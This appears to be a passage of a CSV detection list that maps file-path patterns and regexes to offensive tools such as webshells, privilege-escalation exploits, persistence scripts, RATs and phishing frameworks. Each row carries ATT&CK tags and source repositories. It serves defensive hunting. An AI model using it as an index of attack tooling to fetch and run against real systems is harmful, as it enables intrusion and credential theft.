"*\peeping-tom-main*",".{0,1000}\\peeping\-tom\-main.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","N/A","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","17183"
"*\PerfExec.exe*",".{0,1000}\\PerfExec\.exe.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","N/A","7","1","77","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z","17184"
"*\Perfusion.cpp*",".{0,1000}\\Perfusion\.cpp.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","17185"
"*\Perfusion.exe*",".{0,1000}\\Perfusion\.exe.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","17186"
"*\Perfusion.sln*",".{0,1000}\\Perfusion\.sln.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","17187"
"*\PerfusionDll.cpp*",".{0,1000}\\PerfusionDll\.cpp.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","17188"
"*\PerfusionDll.dll*",".{0,1000}\\PerfusionDll\.dll.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","17189"
"*\PerfusionDll.log*",".{0,1000}\\PerfusionDll\.log.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","17190"
"*\periscope_release_x64.exe*",".{0,1000}\\periscope_release_x64\.exe.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","N/A","N/A","9","","N/A","","","","17191"
"*\Perl Web Shell by RST-GHC.pl*",".{0,1000}\\Perl\sWeb\sShell\sby\sRST\-GHC\.pl.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17192"
"*\perlweb_shell.pl*",".{0,1000}\\perlweb_shell\.pl.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17193"
"*\persist.vbs*",".{0,1000}\\persist\.vbs.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","17194"
"*\persist_bitsadmin.py*",".{0,1000}\\persist_bitsadmin\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17195"
"*\persist_cortana.py*",".{0,1000}\\persist_cortana\.py.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","17196"
"*\persist_cortana.py*",".{0,1000}\\persist_cortana\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17197"
"*\persist_dll_explorer.py*",".{0,1000}\\persist_dll_explorer\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17198"
"*\persist_hkcu_run.py*",".{0,1000}\\persist_hkcu_run\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#registry","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17199"
"*\persist_hklm_run.py*",".{0,1000}\\persist_hklm_run\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#registry","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17200"
"*\persist_ifeo.py*",".{0,1000}\\persist_ifeo\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17201"
"*\persist_mofcomp.py*",".{0,1000}\\persist_mofcomp\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17202"
"*\persist_people.py*",".{0,1000}\\persist_people\.py.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","17203"
"*\persist_people.py*",".{0,1000}\\persist_people\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17204"
"*\persist_schtask.py*",".{0,1000}\\persist_schtask\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17205"
"*\persist_startup_files.py*",".{0,1000}\\persist_startup_files\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17206"
"*\persist_userinit.py*",".{0,1000}\\persist_userinit\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17207"
"*\persist_wmic.py*",".{0,1000}\\persist_wmic\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","17208"
"*\Persiste.ps1*",".{0,1000}\\Persiste\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17209"
"*\Persistence.exe*",".{0,1000}\\Persistence\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","17210"
"*\Persistence.vbs*",".{0,1000}\\Persistence\.vbs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17211"
"*\persistence\elevated\rid_hijack*",".{0,1000}\\persistence\\elevated\\rid_hijack.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","17212"
"*\persistence_demos-master*",".{0,1000}\\persistence_demos\-master.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","17213"
"*\PersistsMalware.cs*",".{0,1000}\\PersistsMalware\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","17214"
"*\PersistViaScheduledTask.ahk*",".{0,1000}\\PersistViaScheduledTask\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","17215"
"*\persit_linux.go*",".{0,1000}\\persit_linux\.go.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","17216"
"*\persit_windows.go*",".{0,1000}\\persit_windows\.go.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","17217"
"*\petit\pipe\srvsvc*",".{0,1000}\\petit\\pipe\\srvsvc.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#namedpipe","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17218"
"*\PetitPotam.exe*",".{0,1000}\\PetitPotam\.exe.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","0","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","17219"
"*\petitpotam.py*",".{0,1000}\\petitpotam\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17220"
"*\PetitPotato.cpp*",".{0,1000}\\PetitPotato\.cpp.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17221"
"*\PetitPotato.log*",".{0,1000}\\PetitPotato\.log.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17222"
"*\petitpotato.obj*",".{0,1000}\\petitpotato\.obj.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17223"
"*\petitpotato.pdb*",".{0,1000}\\petitpotato\.pdb.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17224"
"*\PetitPotato.sln*",".{0,1000}\\PetitPotato\.sln.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17225"
"*\PetitPotato.tlog*",".{0,1000}\\PetitPotato\.tlog.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17226"
"*\PetitPotato.vcxproj*",".{0,1000}\\PetitPotato\.vcxproj.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17227"
"*\petitpotato\x64\*",".{0,1000}\\petitpotato\\x64\\.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17228"
"*\PetitPotato-1.0.0.zip*",".{0,1000}\\PetitPotato\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17229"
"*\PetitPotato-1.0.0\*",".{0,1000}\\PetitPotato\-1\.0\.0\\.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","17230"
"*\PEzor.cpp*",".{0,1000}\\PEzor\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","17231"
"*\PEzor.hpp*",".{0,1000}\\PEzor\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","17232"
"*\PEzor\loader.c*",".{0,1000}\\PEzor\\loader\.c.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","17233"
"*\PhishCreds.ps1*",".{0,1000}\\PhishCreds\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17239"
"*\phishery.exe*",".{0,1000}\\phishery\.exe.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","0","N/A","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","17240"
"*\phishlets\example.yaml*",".{0,1000}\\phishlets\\example\.yaml.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","17241"
"*\php_custom_spy_for_mysql.php*",".{0,1000}\\php_custom_spy_for_mysql\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17242"
"*\php_webshell.py*",".{0,1000}\\php_webshell\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17243"
"*\php-backdoor.php*",".{0,1000}\\php\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","0","N/A","N/A","10","","N/A","","","","17244"
"*\php-backdoor.php*",".{0,1000}\\php\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17245"
"*\phpkit.py*",".{0,1000}\\phpkit\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17246"
"*\phpkitcli.py*",".{0,1000}\\phpkitcli\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17247"
"*\PHPRemoteView.php*",".{0,1000}\\PHPRemoteView\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17248"
"*\phpshell.php*",".{0,1000}\\phpshell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17249"
"*\phpsploit-main*",".{0,1000}\\phpsploit\-main.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","17250"
"*\PHPSPY.php*",".{0,1000}\\PHPSPY\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17251"
"*\PHVNC.exe*",".{0,1000}\\PHVNC\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","17252"
